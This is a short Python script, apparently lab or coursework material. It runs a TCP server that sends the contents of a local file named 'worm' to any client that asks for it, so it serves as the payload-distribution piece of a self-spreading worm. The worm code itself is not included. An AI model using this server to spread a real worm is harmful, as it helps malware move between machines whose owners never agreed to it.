#!/usr/bin/python3
import socket
import sys

def send_worm(PORT):
    IP = socket.gethostbyname(socket.gethostname()+".local")
    ADDR = (IP, PORT)
    SIZE = 1024
    FORMAT = "utf-8"
    filename = "./worm"
    print("[STARTING] Server is starting.")
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(ADDR)
    server.listen()
    print("[LISTENING] Server is listening.")
    while True:
        # Server has accepted the connection from the client.
        conn, addr = server.accept()
        print(f"[NEW CONNECTION] {addr} connected.")
        # Receiving the message from the client. 
        message = conn.recv(SIZE).decode(FORMAT)
        print(f"[RECV] Receiving the message.")
        if message=="worm":
            print("sending worm")
            with open(filename, 'r') as f:
                data = f.read()
            conn.send(data.encode(FORMAT))
        conn.close()
def main():
    if len(sys.argv)==2:
        send_worm(PORT=int(sys.argv[1]))
    else:
        print("usage:", sys.argv[0], "<host PORT>")
        print("auto set port to 4455")
        send_worm(PORT=4455)
    exit(0)
    
if __name__ == "__main__":
    main()
